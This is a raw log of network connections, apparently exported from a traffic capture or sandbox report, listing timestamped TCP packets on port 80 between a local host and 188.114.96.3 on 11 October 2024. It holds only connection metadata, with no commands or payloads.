                                                                Oct 11, 2024 01:37:23.181072950 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.270859957 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.271135092 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:23.276659966 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.276700020 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.291804075 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.292087078 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:23.297210932 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.387289047 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.387429953 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:23.392884016 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.392924070 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.392951965 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.570271015 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.612867117 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:23.675931931 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:23.681456089 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.686677933 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.737930059 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:23.771318913 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.772595882 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:23.777590036 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.777710915 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.947082996 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:23.951018095 CEST5006680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:23.952621937 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.953527927 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:23.956260920 CEST8050066188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.957566977 CEST5006680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:23.971050024 CEST5006680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:23.976351976 CEST8050066188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.074378014 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.128371000 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:24.191509008 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:24.197009087 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.286881924 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.287086964 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:24.292426109 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.292669058 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.316212893 CEST5006680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:24.321490049 CEST8050066188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.321531057 CEST8050066188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.321563959 CEST8050066188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.403330088 CEST8050066188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.456566095 CEST5006680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:24.610033989 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.659755945 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:24.695569992 CEST8050066188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.722718954 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:24.728590965 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.737756968 CEST5006680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:24.810535908 CEST5006680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:24.811269999 CEST5006780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:24.816195011 CEST8050066188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.816263914 CEST8050067188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.816327095 CEST5006780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:24.816382885 CEST5006680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:24.816431046 CEST5006780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:24.818187952 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.818433046 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:24.821540117 CEST8050067188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.823723078 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:24.823764086 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.077531099 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.128658056 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:25.176142931 CEST5006780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:25.181392908 CEST8050067188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.181440115 CEST8050067188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.181468964 CEST8050067188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.191760063 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:25.196749926 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.280973911 CEST8050067188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.287038088 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.287380934 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:25.292905092 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.293382883 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.331691027 CEST5006780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:25.530868053 CEST8050067188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.581561089 CEST5006780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:25.587778091 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.621032000 CEST8050067188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.628407955 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:25.675323009 CEST5006780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:25.691431046 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:25.696777105 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.733326912 CEST5006780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:25.734126091 CEST5006880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:25.739108086 CEST8050067188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.739198923 CEST5006780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:25.739325047 CEST8050068188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.739414930 CEST5006880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:25.739502907 CEST5006880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:25.744843960 CEST8050068188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.787009954 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.787353039 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:25.792897940 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:25.793030024 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.097306013 CEST5006880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:26.100105047 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.102921009 CEST8050068188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.102962017 CEST8050068188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.102989912 CEST8050068188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.144184113 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:26.193032980 CEST8050068188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.207503080 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:26.213009119 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.237823963 CEST5006880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:26.303024054 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.303442955 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:26.309086084 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.309127092 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.364041090 CEST8050068188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.409984112 CEST5006880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:26.514708042 CEST5006880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:26.520565987 CEST8050068188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.520661116 CEST5006880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:26.521583080 CEST5006980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:26.526590109 CEST8050069188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.526791096 CEST5006980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:26.528709888 CEST5006980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:26.533751011 CEST8050069188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.602454901 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.644046068 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:26.708388090 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:26.718799114 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.808737040 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.809070110 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:26.814306021 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.814389944 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:26.878580093 CEST5006980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:27.090992928 CEST8050069188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.092304945 CEST8050069188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.092617035 CEST8050069188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.092647076 CEST8050069188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.108716965 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.144128084 CEST5006980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:27.159707069 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:27.222841978 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:27.228425980 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.318110943 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.318356037 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:27.323374033 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.323519945 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.458091021 CEST8050069188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.503405094 CEST5006980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:27.576694965 CEST5006980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:27.577389002 CEST5007080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:27.582057953 CEST8050069188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.582130909 CEST5006980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:27.582222939 CEST8050070188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.582285881 CEST5007080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:27.582386017 CEST5007080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:27.587204933 CEST8050070188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.613776922 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.659565926 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:27.722592115 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:27.727844954 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.817910910 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.818078995 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:27.822916985 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.823085070 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.940962076 CEST5007080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:27.946002007 CEST8050070188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.946058035 CEST8050070188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:27.946088076 CEST8050070188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.026710987 CEST8050070188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.081444979 CEST5007080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:28.118160009 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.159569025 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:28.223231077 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:28.228065968 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.280070066 CEST8050070188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.318239927 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.318552017 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:28.324250937 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.324383974 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.331633091 CEST5007080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:28.411513090 CEST5007080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:28.412240028 CEST5007180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:28.417089939 CEST8050070188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.417193890 CEST5007080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:28.417269945 CEST8050071188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.417359114 CEST5007180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:28.417577982 CEST5007180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:28.422427893 CEST8050071188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.621596098 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.675384045 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:28.738524914 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:28.743521929 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.769026041 CEST5007180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:28.774036884 CEST8050071188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.774068117 CEST8050071188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.774096012 CEST8050071188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.833584070 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.833771944 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:28.838624954 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.838813066 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.890631914 CEST8050071188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:28.940776110 CEST5007180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:29.061369896 CEST8050071188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:29.112700939 CEST5007180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:29.131598949 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:29.175280094 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:29.243963003 CEST5007180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:29.243968964 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:29.247306108 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:29.249793053 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:29.249978065 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:29.250612974 CEST8050071188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:29.250689983 CEST5007180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:29.252470970 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:29.252692938 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:29.253737926 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:29.258749962 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:29.285537958 CEST5007380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:29.290918112 CEST8050073188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:29.290987015 CEST5007380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:29.291212082 CEST5007380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:29.296391010 CEST8050073188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:29.612755060 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:29.617829084 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:29.617876053 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:29.644129992 CEST5007380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:29.649039984 CEST8050073188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:29.649097919 CEST8050073188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:29.649565935 CEST8050073188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:29.699681044 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:29.752089977 CEST8050073188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:29.753297091 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:29.800252914 CEST5007380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:29.911955118 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:29.956502914 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.007123947 CEST8050073188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.019258976 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.024250031 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.050141096 CEST5007380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.114272118 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.114444017 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.119363070 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.119525909 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.122908115 CEST5007380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.123661995 CEST5007480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.128221989 CEST8050073188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.128318071 CEST5007380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.128494024 CEST8050074188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.128562927 CEST5007480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.128737926 CEST5007480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.133590937 CEST8050074188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.415658951 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.416440964 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.421580076 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.488020897 CEST5007480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.493570089 CEST8050074188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.493621111 CEST8050074188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.493649960 CEST8050074188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.512413025 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.517705917 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.523236990 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.582463026 CEST8050074188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.628349066 CEST5007480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.767726898 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.768294096 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.773243904 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.786979914 CEST8050074188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.831374884 CEST5007480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.862354040 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.862579107 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.867494106 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.867548943 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.901570082 CEST4997280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.905273914 CEST5007480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.906047106 CEST5007580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.910460949 CEST8050074188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.910532951 CEST5007480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.910922050 CEST8050075188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:30.910999060 CEST5007580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.911083937 CEST5007580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:30.916074991 CEST8050075188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.160028934 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.160406113 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:31.165371895 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.256540060 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.256809950 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:31.261821985 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.261853933 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.261883020 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.268971920 CEST5007580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:31.274081945 CEST8050075188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.274111986 CEST8050075188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.274138927 CEST8050075188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.362957954 CEST8050075188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.409504890 CEST5007580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:31.716445923 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.716502905 CEST8050075188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.717614889 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:31.722898960 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.746220112 CEST8050075188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.749558926 CEST5007580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:31.812364101 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.833372116 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:31.838514090 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.838675976 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.947026014 CEST5007580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:31.950846910 CEST5007680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:31.952439070 CEST8050075188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.952519894 CEST5007580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:31.955797911 CEST8050076188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:31.957447052 CEST5007680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:31.957541943 CEST5007680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:31.962327957 CEST8050076188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:32.130439997 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:32.175168991 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:32.238149881 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:32.243151903 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:32.316109896 CEST5007680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:32.321228981 CEST8050076188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:32.321271896 CEST8050076188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:32.321300030 CEST8050076188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:32.332626104 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:32.332881927 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:32.337748051 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:32.337923050 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:32.407094955 CEST8050076188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:32.456374884 CEST5007680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:32.577037096 CEST8050076188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:32.628242970 CEST5007680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:32.633033991 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:32.675112009 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:32.701210022 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:32.701211929 CEST5007680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:32.701834917 CEST5007780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:32.706856966 CEST8050072188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:32.706898928 CEST8050077188.114.96.3192.168.2.5
